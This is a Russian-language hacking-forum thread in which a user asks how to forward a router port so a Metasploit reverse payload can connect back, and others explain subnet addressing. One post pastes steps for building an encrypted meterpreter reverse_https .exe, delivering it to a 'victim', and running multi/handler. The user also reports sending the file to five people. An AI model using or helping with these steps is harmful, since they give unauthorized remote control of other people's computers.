Открыть локальный порт как?

J

jaguar


Установил wifi вопрос как пробросить порт локальный а не 192.168.79.0 ? В модеме пробросил 192.168.79.0 и открыл порт 4444. Уменя два ip один для компа 192.168.79.0 и один внешний локальный 87.240.165.80.Как открыть порт локального? Мне нужно для полезной нагрузки метасплойта.​
 

user.floki

New member
29.05.2017
1
0
BIT
0
192.168.79.0 это локальный ip адрес
87.240.165.80 это внешний ip адрес
 
J

jaguar

значит водить в метасплойт 192.168.79.0 это же ip компьютера разве не локальный?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Просто, жесть, как сформулирован вопрос. Вот принцип работы проброса портов, надеюсь наведет на определенные мысли:
upload_2017-7-18_13-12-41.png
 
  • Нравится
Реакции: jaguar и Ondrik8
J

jaguar

Wifi порт 80 веб-интерейса.Значит водить 192.168.79.0 ip компьютера но в сети полно таких ip и значит сессия не прилетит роутер раздаст 192.168.79.0 ip пайлод wifi.Серер как вернеться назад если два ip если на этот 192.168.79.0 или на этот 87.240.165.80? тогда кагда мы создаем сервер в метасплойте мы прописываем этот 192.168.79.0 ip.Неужели он найдет 87.240.165.80?
 
Последнее редактирование модератором:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Пойдем другим путем... ТС знает про диапазоны локальных сетей? Статические (белые) IP, динамические, серые? Чем они отличаются друг от друга. Без понимания основ ТОЛКА НЕ БУДЕТ (сорь за капс).
upload_2017-7-18_15-4-45.png
 
  • Нравится
Реакции: jaguar и Vertigo

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
вечный вопрос который терзает новичков.. раз уж стали на эту тропу, то отжалейте денег на впс!и ТС не пали свой Питерский ip))
 
  • Нравится
Реакции: Vander
J

jaguar

так я создал сервер в нем прописал ip 87.240.165.80 также в настройках модема и открыл порт 4444 на ip 87.240.165.80 скинул пятерым свой сервер сессия не пришла в чем загвоздка?
[doublepost=1500552670,1500403302][/doublepost]При пробросе порта 4444 ip компьютера меняеться на другой 192.168.79.6
[doublepost=1500552757][/doublepost]что то я делаю не правильно? нет пробива компьютера
 
T

Twix

Лично я мало что понял и удивляюсь что другие отвечали. Проброс порта на роутре или описывается вручную жостко или поднимается ВС.
Задача простая - все входящие снаружи на 87.240.165.80 должны по 4444 порту пробрасываться на 192.168.79.0?
Но что за адрес 192.168.79.0? Его ведь нельзя использовать в качестве адреса интерфейса какого либо хоста! Это же адрес подсети. Или я туплю?
 
  • Нравится
Реакции: Breed и Ondrik8

Breed

Заблокирован
16.05.2017
194
238
BIT
0
192.168.79.0 это локальный ip адрес
При всем уважении: он не может быть локальным IP-адресом! Читайте предпоследнюю строку топа Twix чуть выше.
Это адрес со всеми обнуленными битами на позициях, соответствующих нулям в маске, чтобы определить границы подсети.
Подсказка (для понимания):
Нормальный IP-адрес 192.168.79.1. Это для нас он нормальный, поскольку мы используем десятичную систему счисления и она для нас "удобоварима". Комп же знает и понимает только два типа сигналов: наличие сигнала и его отсутствие. Т.е. триггер принимает значение 0 или 1.
Если коротко, но по сути, то IPv4 состоит из 32-х бит. В двоичном коде это будет
192.168.79.1 при маске 255.255.255.0 =>
11000000.10101000.01001111.00000001 и 11111111.11111111.11111111.00000000
Сама подсеть может принимать адреса из диапазона 192.168.79.1-192.168.79.254
Почему? Это не просто "так принято" :) А вот почему:
В адресе 192.168.79.0 вместо последнего нуля мы можем написать максимально возможное число 255 и ни цента больше! И это обусловлено..... - ПРА-ВИЛЬ-НО! - числом бит в октете!!!
Если в последнем октете мы вместо нулей запишем максимально возможное число, т.е. - все единицы, то получим
11111111.11111111.111111111.11111111,
т.е.
2^0+2^1+2^2+2^3+2^4+2^5+2^6+2^7+2^8= 1+2+4+8+16+32+64+128=255

Ну а комп - это же просто управляемая железка (пока,и слава Богу!). Он, чтобы ориентироваться в границах дозволенного, определяет для себя ГРАНИЦЫ СЕТИ.
Как?
Да очень просто:
он делает для себя побитную коньюнкцию (логическое И) в полученных или назначенных IP-адресе и маске.
Итак:
192.168.79.0 и
255.255.255.0
В двоичном:
11000000.10101000.01001111.00000001
11111111.11111111.11111111.00000000
==================================
11000000.10101000.01001111.00000000

что в десятичном виде выглядит, как 192.168.79.0
А 192.168.79.255 - это широковещательный адрес, он показывает "противоположную границу" и тоже запрещен к использованию в качестве IP интерфейса.

Теперь сам себе ответь на свой вопрос: куда модем перенаправляет запрос?


Но что за адрес 192.168.79.0? Его ведь нельзя использовать в качестве адреса интерфейса какого либо хоста! Это же адрес подсети. Или я туплю?
Поддерживаю. Значит нас, тупых, уже двое!
что то я делаю не правильно? нет пробива компьютера
А чему тут пробиваться-то? Я, к примеру, так же, как и Twix, никак не вкурю, как это
В модеме пробросил 192.168.79.0 и открыл порт 4444.​
и модем не "возмутился"? ;)
Мне кажется, что ты "пробросил" , образно говоря, 192.168.79.0-255 (включая направленный броадкаст, который, кстати, также нельзя использовать в качестве адреса интерфейса хоста). И что, по-твоему, должен делать модем, получив на входе запрос? Куда перенаправлять?
Лучший выход для него - IMHO - "пикнуть" (ну должен же он высказать всё, что думает по этому поводу!), поморгать индикацией и задымиться :)
 
J

jaguar

Вот и написал Brib полно, а простым языком объянить можно всю теорию и то ошибочную нас уже трое. Я делал все как показывали на примере те кто создавал тему про метасплойт водил 192.168....... порт 4444 и.т.д как у них на скрине. Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP) заходим на сайт 2ip.ru и смотрим свой ip

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Созданный файл любым путем доставляем на компьютер жертвы.

Далее

Запускаем Metasploit.
#msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (Свой внутренний IP) водим ifconfig
msf exploit (handler) > set LPORT 443
msf exploit (handler) >exploit

Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>. Правильная схема для (WIFI)товарищи революционеры?
[doublepost=1500601948,1500601079][/doublepost]Но прежде делаем проброс порта 4444 в модеме 192.168.0.1 водим свой внутренний IP 192.168.79.0
83.199.12.XXX публичный водить не надо?
 

Breed

Заблокирован
16.05.2017
194
238
BIT
0
Вот и написал Brib полно, а простым языком объянить можно всю теорию и то ошибочную нас уже трое.
  • Полно, но неправильно?
  • подчеркнутое напоминает "казнить нельзя помиловать" - угадай, где знаки препинания. Дружище, я никоим образом не хочу упрекнуть или унизить кого-либо, но давайте малость уважать друг друга! Если таким "...простым языком объяснить всю теорию...", то вряд ли она станет понятной, а, следовательно, не будет объяснением. Я правильно понял: "написал Brib много, но неверно. Можно объяснить проще. Но я тоже ничего не понял из объяснений выше и потому нас, непонимающих, уже трое"???
Далее: ткните меня носом где именно в моих объяснениях у меня ошибка. Я вел речь о 192.168.79.0/24. Пусть я неправ, я хочу разобраться. Все свои объяснения я могу аргументировать.
[doublepost=1500617144,1500616990][/doublepost]Помощь от сообщества только приветствуется.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!